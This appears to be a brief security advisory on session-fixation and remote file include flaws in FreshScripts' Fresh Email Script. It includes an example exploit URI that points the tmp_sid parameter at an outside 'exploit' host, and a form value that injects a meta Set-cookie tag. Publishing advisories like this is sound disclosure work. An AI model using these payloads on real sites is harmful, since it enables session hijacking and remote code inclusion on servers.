FreshScripts Fresh Email Script Session Fixation and Remote File Include Vulnerabilities

FreshScripts Fresh Email Script Session Fixation and Remote File Include Vulnerabilities

To exploit the session-fixation issue, an attacker must entice an unsuspecting victim into following a malicious URI.

The following example URI is available:

http://www.example.com/url.php?tmp_sid=http://www.example2.com/exploit

The following example cookie is available:

Email=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&Password=1230321email@address.com&register=Register